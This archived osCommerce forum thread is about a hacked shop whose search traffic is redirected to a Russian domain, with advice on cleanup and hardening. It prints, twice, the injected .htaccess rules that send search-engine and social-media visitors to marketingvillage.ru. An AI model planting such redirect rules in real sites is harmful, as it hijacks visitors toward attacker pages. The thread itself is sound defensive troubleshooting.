nazs Posted October 4, 2011 Posted October 4, 2011 Hi Has anyone had this similar problem? I have asked my web host to restore my site to a healthy date (2 weeks ago) but still having the same problem. I don't see it in the English forum but googled it and found similar issue with a German osCommerce member at http://forums.oscomm...showtopic=79859 which basically means: ============= member1: hmm, did a few days since a problem with my oscommerce online shop. everything works perfectly, except the search. When I searched items on the fast search function, and then click, is constantly trying to http://renamenetwork.ru forward and not to the articles in my shop. which is fast file search for the jurisdiction? would indeed be in the PHP file has an entry for http://renamenetwork.ru give, hopefully I can remove ... member2: Hi apparently been hacked and your shop contains malicious code. Greetings Stefan =============== Any pointers is greatly appreciated. Naz
nazs Posted October 4, 2011 Author Posted October 4, 2011 Problem solved. In case anyone is hit by the same nightmare, here is the solution: http://sucuri.net/malware/malware-entry-mwhta7 Naz
Taipo Posted October 5, 2011 Posted October 5, 2011 Certainly removing the malware code from your htaccess file will end the redirection attack, but it does not resolve the question of how the code got there in the first instance. Imagine you have a powertool stored in a shed and someone is able to enter your shed and turning the powertool on because there are no locks on the door. Everyday you go into your shed, the powertool is running. Obviously switching the powertool off at the wall is not really the solution, but merely a temporary reprieve for your ears, and of course, may save you some electricity use, but the solution is to prevent the invader from getting into the shed in the first place. To prevent further exploitation of the vulnerable code on out of date versions of osCommerce you will need to at least make these changes here or consider installing the latest version of the osC_Sec addon/contribution. Also 'consider' either renaming the admin directory and/or installing HTTP Basic Authentication on that directory as has become the standard practice for web systems that have publicly accessible admin login pages. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX
nazs Posted October 6, 2011 Author Posted October 6, 2011 Hi Taipo Thank you for your reply. I have just installed your OsC_Sec contribution (osC_Sec 4.0[r8]) today. My admin has long been changed to something else. All was ok for about almost an hour before I got attacked again. It's my .htaccess file that has been amended by that hack to below lines: ErrorDocument 400 http://marketingvillage.ru/advertising/index.php ErrorDocument 401 http://marketingvillage.ru/advertising/index.php ErrorDocument 403 http://marketingvillage.ru/advertising/index.php ErrorDocument 404 http://marketingvillage.ru/advertising/index.php ErrorDocument 500 http://marketingvillage.ru/advertising/index.php <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.* [OR] RewriteCond %{HTTP_REFERER} .*ask.* [OR] RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] RewriteCond %{HTTP_REFERER} .*baidu.* [OR] RewriteCond %{HTTP_REFERER} .*youtube.* [OR] RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR] RewriteCond %{HTTP_REFERER} .*qq.* [OR] RewriteCond %{HTTP_REFERER} .*excite.* [OR] RewriteCond %{HTTP_REFERER} .*altavista.* [OR] RewriteCond %{HTTP_REFERER} .*msn.* [OR] RewriteCond %{HTTP_REFERER} .*netscape.* [OR] RewriteCond %{HTTP_REFERER} .*aol.* [OR] RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] RewriteCond %{HTTP_REFERER} .*goto.* [OR] RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] RewriteCond %{HTTP_REFERER} .*mamma.* [OR] RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] RewriteCond %{HTTP_REFERER} .*lycos.* [OR] RewriteCond %{HTTP_REFERER} .*search.* [OR] RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR] RewriteCond %{HTTP_REFERER} .*bing.* [OR] RewriteCond %{HTTP_REFERER} .*dogpile.* [OR] RewriteCond %{HTTP_REFERER} .*facebook.* [OR] RewriteCond %{HTTP_REFERER} .*twitter.* [OR] RewriteCond %{HTTP_REFERER} .*blog.* [OR] RewriteCond %{HTTP_REFERER} .*live.* [OR] RewriteCond %{HTTP_REFERER} .*myspace.* [OR] RewriteCond %{HTTP_REFERER} .*mail.* [OR] RewriteCond %{HTTP_REFERER} .*yandex.* [OR] RewriteCond %{HTTP_REFERER} .*rambler.* [OR] RewriteCond %{HTTP_REFERER} .*ya.* [OR] RewriteCond %{HTTP_REFERER} .*aport.* [OR] RewriteCond %{HTTP_REFERER} .*linkedin.* [OR] RewriteCond %{HTTP_REFERER} .*flickr.* RewriteRule ^(.*)$ http://marketingvillage.ru/advertising/index.php [R=301,L] </IfModule> ErrorDocument 400 http://marketingvillage.ru/advertising/index.php ErrorDocument 401 http://marketingvillage.ru/advertising/index.php ErrorDocument 403 http://marketingvillage.ru/advertising/index.php ErrorDocument 404 http://marketingvillage.ru/advertising/index.php ErrorDocument 500 http://marketingvillage.ru/advertising/index.php <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.* [OR] RewriteCond %{HTTP_REFERER} .*ask.* [OR] RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] RewriteCond %{HTTP_REFERER} .*baidu.* [OR] RewriteCond %{HTTP_REFERER} .*youtube.* [OR] RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR] RewriteCond %{HTTP_REFERER} .*qq.* [OR] RewriteCond %{HTTP_REFERER} .*excite.* [OR] RewriteCond %{HTTP_REFERER} .*altavista.* [OR] RewriteCond %{HTTP_REFERER} .*msn.* [OR] RewriteCond %{HTTP_REFERER} .*netscape.* [OR] RewriteCond %{HTTP_REFERER} .*aol.* [OR] RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] RewriteCond %{HTTP_REFERER} .*goto.* [OR] RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] RewriteCond %{HTTP_REFERER} .*mamma.* [OR] RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] RewriteCond %{HTTP_REFERER} .*lycos.* [OR] RewriteCond %{HTTP_REFERER} .*search.* [OR] RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR] RewriteCond %{HTTP_REFERER} .*bing.* [OR] RewriteCond %{HTTP_REFERER} .*dogpile.* [OR] RewriteCond %{HTTP_REFERER} .*facebook.* [OR] RewriteCond %{HTTP_REFERER} .*twitter.* [OR] RewriteCond %{HTTP_REFERER} .*blog.* [OR] RewriteCond %{HTTP_REFERER} .*live.* [OR] RewriteCond %{HTTP_REFERER} .*myspace.* [OR] RewriteCond %{HTTP_REFERER} .*mail.* [OR] RewriteCond %{HTTP_REFERER} .*yandex.* [OR] RewriteCond %{HTTP_REFERER} .*rambler.* [OR] RewriteCond %{HTTP_REFERER} .*ya.* [OR] RewriteCond %{HTTP_REFERER} .*aport.* [OR] RewriteCond %{HTTP_REFERER} .*linkedin.* [OR] RewriteCond %{HTTP_REFERER} .*flickr.* RewriteRule ^(.*)$ http://marketingvillage.ru/advertising/index.php [R=301,L] </IfModule> I guess what's left now is to install HTTP Basic Authentication like you said. Thank you for your help. You are a STAR. Naz
Taipo Posted October 6, 2011 Posted October 6, 2011 Often this type of attack can reoccur because the code the attackers are using to append code to your site files are still in your website directories somewhere. Have you found and removed all the malware code from your site files? They are often in .php files in the image directory, or code added into files like cookie_usage.php, includes/languages/[yourlanguage]/cookie_usage.php and more. If there is still malicious code resident in files on your site then there is not much any protections can do to prevent further attacks. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX
nazs Posted October 7, 2011 Author Posted October 7, 2011 Thank you Taipo. Never thought of that. Will do that as well.
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.